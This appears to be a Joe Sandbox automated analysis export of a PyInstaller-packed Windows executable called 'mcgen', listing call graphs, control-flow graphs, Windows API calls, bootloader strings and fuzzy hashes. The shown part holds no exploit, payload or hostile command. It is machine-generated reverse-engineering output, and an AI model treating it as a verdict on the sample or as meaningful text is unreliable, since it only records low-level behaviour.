18970->18973 18972 7ff6b9f27981 18972->17348 18974 7ff6b9f2745f 18973->18974 18975 7ff6b9f2748e 18973->18975 18976 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18974->18976 18983 7ff6b9f254dc EnterCriticalSection 18975->18983 18979 7ff6b9f2747f 18976->18979 18979->18972 18985 7ff6b9f1fee1 18984->18985 18986 7ff6b9f1feb3 18984->18986 18989 7ff6b9f1fed3 18985->18989 18994 7ff6b9f254dc EnterCriticalSection 18985->18994 18987 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18986->18987 18987->18989 18989->17354 18996 7ff6b9f145b0 108 API calls 18995->18996 18997 7ff6b9f11493 18996->18997 18998 7ff6b9f1149b 18997->18998 18999 7ff6b9f114bc 18997->18999 19000 7ff6b9f12710 54 API calls 18998->19000 19001 7ff6b9f20744 73 API calls 18999->19001 19002 7ff6b9f114ab 19000->19002 19003 7ff6b9f114d1 19001->19003 19002->17380 19004 7ff6b9f114f8 19003->19004 19005 7ff6b9f114d5 19003->19005 19009 7ff6b9f11508 19004->19009 19010 7ff6b9f11532 19004->19010 19006 7ff6b9f24f78 _get_daylight 11 API calls 19005->19006 19007 7ff6b9f114da 19006->19007 19008 7ff6b9f12910 54 API calls 19007->19008 19017 7ff6b9f114f3 __std_exception_copy 19008->19017 19012 7ff6b9f24f78 _get_daylight 11 API calls 19009->19012 19011 7ff6b9f11538 19010->19011 19020 7ff6b9f1154b 19010->19020 19014 7ff6b9f11210 92 API calls 19011->19014 19013 7ff6b9f11510 19012->19013 19015 7ff6b9f12910 54 API calls 19013->19015 19014->19017 19015->19017 19016 7ff6b9f200bc 74 API calls 19017->19016 19019 7ff6b9f2040c _fread_nolock 53 API calls 19019->19020 19020->19017 19020->19019 19021 7ff6b9f115d6 19020->19021 19022 7ff6b9f24f78 _get_daylight 11 API calls 19021->19022 19102 7ff6b9f16365 19101->19102 19103 7ff6b9f11c80 49 API calls 19102->19103 19104 7ff6b9f163a1 19103->19104 19105 7ff6b9f163aa 19104->19105 19106 7ff6b9f163cd 19104->19106 19107 7ff6b9f12710 54 API calls 19105->19107 19108 7ff6b9f14620 49 API calls 19106->19108 19109 7ff6b9f163c3 19107->19109 19110 7ff6b9f163e5 19108->19110 19114 7ff6b9f1c5c0 _log10_special 8 API calls 19109->19114 19111 7ff6b9f16403 19110->19111 19112 7ff6b9f12710 54 API calls 19110->19112 19113 7ff6b9f14550 10 API calls 19111->19113 19112->19111 19116 7ff6b9f1640d 19113->19116 19115 7ff6b9f1336e 19114->19115 19115->17449 19132 7ff6b9f164f0 19115->19132 19117 7ff6b9f1641b 19116->19117 19118 7ff6b9f19070 3 API calls 19116->19118 19119 7ff6b9f14620 49 API calls 19117->19119 19118->19117 19120 7ff6b9f16434 19119->19120 19121 7ff6b9f16459 19120->19121 19122 7ff6b9f16439 19120->19122 19281 7ff6b9f153f0 19132->19281 19134 7ff6b9f16516 19283 7ff6b9f1541c 19281->19283 19282 7ff6b9f15424 19282->19134 19283->19282 19286 7ff6b9f155c4 19283->19286 19312 7ff6b9f26b14 19283->19312 19284 7ff6b9f15787 __std_exception_copy 19284->19134 19285 7ff6b9f147c0 47 API calls 19285->19286 19286->19284 19286->19285 19313 7ff6b9f26b44 19312->19313 19374->17457 19376 7ff6b9f2b1c0 __CxxCallCatchBlock 45 API calls 19375->19376 19377 7ff6b9f2a451 19376->19377 19378 7ff6b9f2a574 __CxxCallCatchBlock 45 API calls 19377->19378 19379 7ff6b9f2a471 19378->19379

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 7ff6b9f18bd0-7ff6b9f18d16 call 7ff6b9f1c8c0 call 7ff6b9f19400 SetConsoleCtrlHandler GetStartupInfoW call 7ff6b9f25460 call 7ff6b9f2a4ec call 7ff6b9f2878c call 7ff6b9f25460 call 7ff6b9f2a4ec call 7ff6b9f2878c call 7ff6b9f25460 call 7ff6b9f2a4ec call 7ff6b9f2878c GetCommandLineW CreateProcessW 23 7ff6b9f18d18-7ff6b9f18d38 GetLastError call 7ff6b9f12c50 0->23 24 7ff6b9f18d3d-7ff6b9f18d79 RegisterClassW 0->24 31 7ff6b9f19029-7ff6b9f1904f call 7ff6b9f1c5c0 23->31 26 7ff6b9f18d7b GetLastError 24->26 27 7ff6b9f18d81-7ff6b9f18dd5 CreateWindowExW 24->27 26->27 29 7ff6b9f18dd7-7ff6b9f18ddd GetLastError 27->29 30 7ff6b9f18ddf-7ff6b9f18de4 ShowWindow 27->30 32 7ff6b9f18dea-7ff6b9f18dfa WaitForSingleObject 29->32 30->32 34 7ff6b9f18e78-7ff6b9f18e7f 32->34 35 7ff6b9f18dfc 32->35 36 7ff6b9f18e81-7ff6b9f18e91 WaitForSingleObject 34->36 37 7ff6b9f18ec2-7ff6b9f18ec9 34->37 39 7ff6b9f18e00-7ff6b9f18e03 35->39 40 7ff6b9f18e97-7ff6b9f18ea7 TerminateProcess 36->40 41 7ff6b9f18fe8-7ff6b9f18ff2 36->41 42 7ff6b9f18ecf-7ff6b9f18ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff6b9f18fb0-7ff6b9f18fc9 GetMessageW 37->43 44 7ff6b9f18e0b-7ff6b9f18e12 39->44 45 7ff6b9f18e05 GetLastError 39->45 48 7ff6b9f18ea9 GetLastError 40->48 49 7ff6b9f18eaf-7ff6b9f18ebd WaitForSingleObject 40->49 46 7ff6b9f19001-7ff6b9f19025 GetExitCodeProcess CloseHandle * 2 41->46 47 7ff6b9f18ff4-7ff6b9f18ffa DestroyWindow 41->47 50 7ff6b9f18ef0-7ff6b9f18f28 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff6b9f18fcb-7ff6b9f18fd9 TranslateMessage DispatchMessageW 43->52 53 7ff6b9f18fdf-7ff6b9f18fe6 43->53 44->36 51 7ff6b9f18e14-7ff6b9f18e31 PeekMessageW 44->51 45->44 46->31 47->46 48->49 49->41 54 7ff6b9f18f2a 50->54 55 7ff6b9f18f63-7ff6b9f18f6a 50->55 56 7ff6b9f18e66-7ff6b9f18e76 WaitForSingleObject 51->56 57 7ff6b9f18e33-7ff6b9f18e64 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->41 53->43 58 7ff6b9f18f30-7ff6b9f18f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->43 59 7ff6b9f18f6c-7ff6b9f18f95 QueryPerformanceCounter 55->59 56->34 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff6b9f18f9b-7ff6b9f18fa2 59->60 60->41 61 7ff6b9f18fa4-7ff6b9f18fa8 60->61 61->43
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                    • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                    • Instruction ID: 98dcccba2711abca994aef8fa64f4333f204820b35811ecbe5e3d1a3f9304713
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDD18572A08B9286EB209F78E8542BD3768FF85BAAF500235DB5D836A4DF3CD145C741

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 62 7ff6b9f11000-7ff6b9f13806 call 7ff6b9f1fe88 call 7ff6b9f1fe90 call 7ff6b9f1c8c0 call 7ff6b9f25460 call 7ff6b9f254f4 call 7ff6b9f136b0 76 7ff6b9f13808-7ff6b9f1380f 62->76 77 7ff6b9f13814-7ff6b9f13836 call 7ff6b9f11950 62->77 78 7ff6b9f13c97-7ff6b9f13cb2 call 7ff6b9f1c5c0 76->78 82 7ff6b9f1391b-7ff6b9f13931 call 7ff6b9f145b0 77->82 83 7ff6b9f1383c-7ff6b9f13856 call 7ff6b9f11c80 77->83 90 7ff6b9f1396a-7ff6b9f1397f call 7ff6b9f12710 82->90 91 7ff6b9f13933-7ff6b9f13960 call 7ff6b9f17f80 82->91 87 7ff6b9f1385b-7ff6b9f1389b call 7ff6b9f18a20 83->87 96 7ff6b9f1389d-7ff6b9f138a3 87->96 97 7ff6b9f138c1-7ff6b9f138cc call 7ff6b9f24fa0 87->97 99 7ff6b9f13c8f 90->99 103 7ff6b9f13962-7ff6b9f13965 call 7ff6b9f200bc 91->103 104 7ff6b9f13984-7ff6b9f139a6 call 7ff6b9f11c80 91->104 100 7ff6b9f138af-7ff6b9f138bd call 7ff6b9f18b90 96->100 101 7ff6b9f138a5-7ff6b9f138ad 96->101 111 7ff6b9f139fc-7ff6b9f13a2a call 7ff6b9f18b30 call 7ff6b9f18b90 * 3 97->111 112 7ff6b9f138d2-7ff6b9f138e1 call 7ff6b9f18a20 97->112 99->78 100->97 101->100 103->90 114 7ff6b9f139b0-7ff6b9f139b9 104->114 138 7ff6b9f13a2f-7ff6b9f13a3e call 7ff6b9f18a20 111->138 119 7ff6b9f138e7-7ff6b9f138ed 112->119 120 7ff6b9f139f4-7ff6b9f139f7 call 7ff6b9f24fa0 112->120 114->114 118 7ff6b9f139bb-7ff6b9f139d8 call 7ff6b9f11950 114->118 118->87 130 7ff6b9f139de-7ff6b9f139ef call 7ff6b9f12710 118->130 123 7ff6b9f138f0-7ff6b9f138fc 119->123 120->111 127 7ff6b9f138fe-7ff6b9f13903 123->127 128 7ff6b9f13905-7ff6b9f13908 123->128 127->123 127->128 128->120 131 7ff6b9f1390e-7ff6b9f13916 call 7ff6b9f24fa0 128->131 130->99 131->138 141 7ff6b9f13a44-7ff6b9f13a47 138->141 142 7ff6b9f13b45-7ff6b9f13b53 138->142 141->142 145 7ff6b9f13a4d-7ff6b9f13a50 141->145 143 7ff6b9f13a67 142->143 144 7ff6b9f13b59-7ff6b9f13b5d 142->144 146 7ff6b9f13a6b-7ff6b9f13a90 call 7ff6b9f24fa0 143->146 144->146 147 7ff6b9f13a56-7ff6b9f13a5a 145->147 148 7ff6b9f13b14-7ff6b9f13b17 145->148 156 7ff6b9f13aab-7ff6b9f13ac0 146->156 157 7ff6b9f13a92-7ff6b9f13aa6 call 7ff6b9f18b30 146->157 147->148 150 7ff6b9f13a60 147->150 151 7ff6b9f13b19-7ff6b9f13b1d 148->151 152 7ff6b9f13b2f-7ff6b9f13b40 call 7ff6b9f12710 148->152 150->143 151->152 155 7ff6b9f13b1f-7ff6b9f13b2a 151->155 160 7ff6b9f13c7f-7ff6b9f13c87 152->160 155->146 161 7ff6b9f13ac6-7ff6b9f13aca 156->161 162 7ff6b9f13be8-7ff6b9f13bfa call 7ff6b9f18a20 156->162 157->156 160->99 164 7ff6b9f13bcd-7ff6b9f13be2 call 7ff6b9f11940 161->164 165 7ff6b9f13ad0-7ff6b9f13ae8 call 7ff6b9f252c0 161->165 170 7ff6b9f13bfc-7ff6b9f13c02 162->170 171 7ff6b9f13c2e 162->171 164->161 164->162 175 7ff6b9f13aea-7ff6b9f13b02 call 7ff6b9f252c0 165->175 176 7ff6b9f13b62-7ff6b9f13b7a call 7ff6b9f252c0 165->176 173 7ff6b9f13c1e-7ff6b9f13c2c 170->173 174 7ff6b9f13c04-7ff6b9f13c1c 170->174 177 7ff6b9f13c31-7ff6b9f13c40 call 7ff6b9f24fa0 171->177 173->177 174->177 175->164 186 7ff6b9f13b08-7ff6b9f13b0f 175->186 184 7ff6b9f13b87-7ff6b9f13b9f call 7ff6b9f252c0 176->184 185 7ff6b9f13b7c-7ff6b9f13b80 176->185 187 7ff6b9f13c46-7ff6b9f13c4a 177->187 188 7ff6b9f13d41-7ff6b9f13d63 call 7ff6b9f144d0 177->188 201 7ff6b9f13bac-7ff6b9f13bc4 call 7ff6b9f252c0 184->201 202 7ff6b9f13ba1-7ff6b9f13ba5 184->202 185->184 186->164 191 7ff6b9f13c50-7ff6b9f13c5f call 7ff6b9f190e0 187->191 192 7ff6b9f13cd4-7ff6b9f13ce6 call 7ff6b9f18a20 187->192 199 7ff6b9f13d71-7ff6b9f13d82 call 7ff6b9f11c80 188->199 200 7ff6b9f13d65-7ff6b9f13d6f call 7ff6b9f14620 188->200 203 7ff6b9f13c61 191->203 204 7ff6b9f13cb3-7ff6b9f13cb6 call 7ff6b9f18850 191->204 205 7ff6b9f13ce8-7ff6b9f13ceb 192->205 206 7ff6b9f13d35-7ff6b9f13d3c 192->206 213 7ff6b9f13d87-7ff6b9f13d96 199->213 200->213 201->164 216 7ff6b9f13bc6 201->216 202->201 210 7ff6b9f13c68 call 7ff6b9f12710 203->210 221 7ff6b9f13cbb-7ff6b9f13cbd 204->221 205->206 211 7ff6b9f13ced-7ff6b9f13d10 call 7ff6b9f11c80 205->211 206->210 222 7ff6b9f13c6d-7ff6b9f13c77 210->222 228 7ff6b9f13d2b-7ff6b9f13d33 call 7ff6b9f24fa0 211->228 229 7ff6b9f13d12-7ff6b9f13d26 call 7ff6b9f12710 call 7ff6b9f24fa0 211->229 219 7ff6b9f13d98-7ff6b9f13d9f 213->219 220 7ff6b9f13dc4-7ff6b9f13dda call 7ff6b9f19400 213->220 216->164 219->220 224 7ff6b9f13da1-7ff6b9f13da5 219->224 234 7ff6b9f13de8-7ff6b9f13e04 SetDllDirectoryW 220->234 235 7ff6b9f13ddc 220->235 226 7ff6b9f13cc8-7ff6b9f13ccf 221->226 227 7ff6b9f13cbf-7ff6b9f13cc6 221->227 222->160 224->220 230 7ff6b9f13da7-7ff6b9f13dbe SetDllDirectoryW LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->220 236 7ff6b9f13e0a-7ff6b9f13e19 call 7ff6b9f18a20 234->236 237 7ff6b9f13f01-7ff6b9f13f08 234->237 235->234 250 7ff6b9f13e1b-7ff6b9f13e21 236->250 251 7ff6b9f13e32-7ff6b9f13e3c call 7ff6b9f24fa0 236->251 242 7ff6b9f13ffc-7ff6b9f14004 237->242 243 7ff6b9f13f0e-7ff6b9f13f15 237->243 247 7ff6b9f14006-7ff6b9f14023 PostMessageW GetMessageW 242->247 248 7ff6b9f14029-7ff6b9f1405b call 7ff6b9f136a0 call 7ff6b9f13360 call 7ff6b9f13670 call 7ff6b9f16fb0 call 7ff6b9f16d60 242->248 243->242 246 7ff6b9f13f1b-7ff6b9f13f25 call 7ff6b9f133c0 243->246 246->222 258 7ff6b9f13f2b-7ff6b9f13f3f call 7ff6b9f190c0 246->258 247->248 255 7ff6b9f13e2d-7ff6b9f13e2f 250->255 256 7ff6b9f13e23-7ff6b9f13e2b 250->256 263 7ff6b9f13ef2-7ff6b9f13efc call 7ff6b9f18b30 251->263 264 7ff6b9f13e42-7ff6b9f13e48 251->264 255->251 256->255 269 7ff6b9f13f41-7ff6b9f13f5e PostMessageW GetMessageW 258->269 270 7ff6b9f13f64-7ff6b9f13fa0 call 7ff6b9f18b30 call 7ff6b9f18bd0 call 7ff6b9f16fb0 call 7ff6b9f16d60 call 7ff6b9f18ad0 258->270 263->237 264->263 268 7ff6b9f13e4e-7ff6b9f13e54 264->268 272 7ff6b9f13e56-7ff6b9f13e58 268->272 273 7ff6b9f13e5f-7ff6b9f13e61 268->273 269->270 308 7ff6b9f13fa5-7ff6b9f13fa7 270->308 274 7ff6b9f13e67-7ff6b9f13e83 call 7ff6b9f16db0 call 7ff6b9f17330 272->274 277 7ff6b9f13e5a 272->277 273->237 273->274 289 7ff6b9f13e8e-7ff6b9f13e95 274->289 290 7ff6b9f13e85-7ff6b9f13e8c 274->290 277->237 293 7ff6b9f13e97-7ff6b9f13ea4 call 7ff6b9f16df0 289->293 294 7ff6b9f13eaf-7ff6b9f13eb9 call 7ff6b9f171a0 289->294 292 7ff6b9f13edb-7ff6b9f13ef0 call 7ff6b9f12a50 call 7ff6b9f16fb0 call 7ff6b9f16d60 290->292 292->237 293->294 305 7ff6b9f13ea6-7ff6b9f13ead 293->305 306 7ff6b9f13ebb-7ff6b9f13ec2 294->306 307 7ff6b9f13ec4-7ff6b9f13ed2 call 7ff6b9f174e0 294->307 305->292 306->292 307->237 317 7ff6b9f13ed4 307->317 310 7ff6b9f13fe9-7ff6b9f13ff7 call 7ff6b9f11900 308->310 311 7ff6b9f13fa9-7ff6b9f13fb3 call 7ff6b9f19200 308->311 310->222 311->310 321 7ff6b9f13fb5-7ff6b9f13fca 311->321 317->292 322 7ff6b9f13fcc-7ff6b9f13fdf call 7ff6b9f12710 call 7ff6b9f11900 321->322 323 7ff6b9f13fe4 call 7ff6b9f12a50 321->323 322->222 323->310
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                                    • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                                    • Opcode ID: e0b1f9155b3603635f161de1b17827032b7743c1fa0fa9248d3b63a24b6fabb3
                                                                                                                                                                                                                                                                    • Instruction ID: 135fa4c788c9026630f2cee632232ada895aba3aba885dcbd0220dcff0b655a6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b1f9155b3603635f161de1b17827032b7743c1fa0fa9248d3b63a24b6fabb3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E32B1A1E0C6B252FB25DF3994543B96699AF467A2F844032DB5DC32C2EF6CE558C380

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 536 7ff6b9f369d4-7ff6b9f36a47 call 7ff6b9f36708 539 7ff6b9f36a49-7ff6b9f36a52 call 7ff6b9f24f58 536->539 540 7ff6b9f36a61-7ff6b9f36a6b call 7ff6b9f28590 536->540 545 7ff6b9f36a55-7ff6b9f36a5c call 7ff6b9f24f78 539->545 546 7ff6b9f36a86-7ff6b9f36aef CreateFileW 540->546 547 7ff6b9f36a6d-7ff6b9f36a84 call 7ff6b9f24f58 call 7ff6b9f24f78 540->547 559 7ff6b9f36da2-7ff6b9f36dc2 545->559 550 7ff6b9f36b6c-7ff6b9f36b77 GetFileType 546->550 551 7ff6b9f36af1-7ff6b9f36af7 546->551 547->545 553 7ff6b9f36b79-7ff6b9f36bb4 GetLastError call 7ff6b9f24eec CloseHandle 550->553 554 7ff6b9f36bca-7ff6b9f36bd1 550->554 556 7ff6b9f36b39-7ff6b9f36b67 GetLastError call 7ff6b9f24eec 551->556 557 7ff6b9f36af9-7ff6b9f36afd 551->557 553->545 570 7ff6b9f36bba-7ff6b9f36bc5 call 7ff6b9f24f78 553->570 562 7ff6b9f36bd9-7ff6b9f36bdc 554->562 563 7ff6b9f36bd3-7ff6b9f36bd7 554->563 556->545 557->556 564 7ff6b9f36aff-7ff6b9f36b37 CreateFileW 557->564 568 7ff6b9f36be2-7ff6b9f36c37 call 7ff6b9f284a8 562->568 569 7ff6b9f36bde 562->569 563->568 564->550 564->556 574 7ff6b9f36c39-7ff6b9f36c45 call 7ff6b9f36910 568->574 575 7ff6b9f36c56-7ff6b9f36c87 call 7ff6b9f36488 568->575 569->568 570->545 574->575 581 7ff6b9f36c47 574->581 582 7ff6b9f36c89-7ff6b9f36c8b 575->582 583 7ff6b9f36c8d-7ff6b9f36ccf 575->583 584 7ff6b9f36c49-7ff6b9f36c51 call 7ff6b9f2ab30 581->584 582->584 585 7ff6b9f36cf1-7ff6b9f36cfc 583->585 586 7ff6b9f36cd1-7ff6b9f36cd5 583->586 584->559 589 7ff6b9f36da0 585->589 590 7ff6b9f36d02-7ff6b9f36d06 585->590 586->585 588 7ff6b9f36cd7-7ff6b9f36cec 586->588 588->585 589->559 590->589 591 7ff6b9f36d0c-7ff6b9f36d51 CloseHandle CreateFileW 590->591 593 7ff6b9f36d86-7ff6b9f36d9b 591->593 594 7ff6b9f36d53-7ff6b9f36d81 GetLastError call 7ff6b9f24eec call 7ff6b9f286d0 591->594 593->589 594->593
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction ID: 3a7869cc3003580e969181492753bc0c8568c4aa9f79d8b235a2c8f0c9486d47
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC1AE36B28A4585EB20DFB9C4912BC3769FB49BA9B115229DB2E9B7D4CF3CD451C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F1841B
                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F1849E
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184BD
                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184CB
                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184DC
                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184E5
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                    • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                    • Instruction ID: 83dc515342b86f3fa047209b2e4ff4baba44334c6e76303dfa23ae0d2a6f8301
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3841A261A0C96285EA309F2CE5541B96368FB967B6F900232DB9DC36C4DF3CD64AC784
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
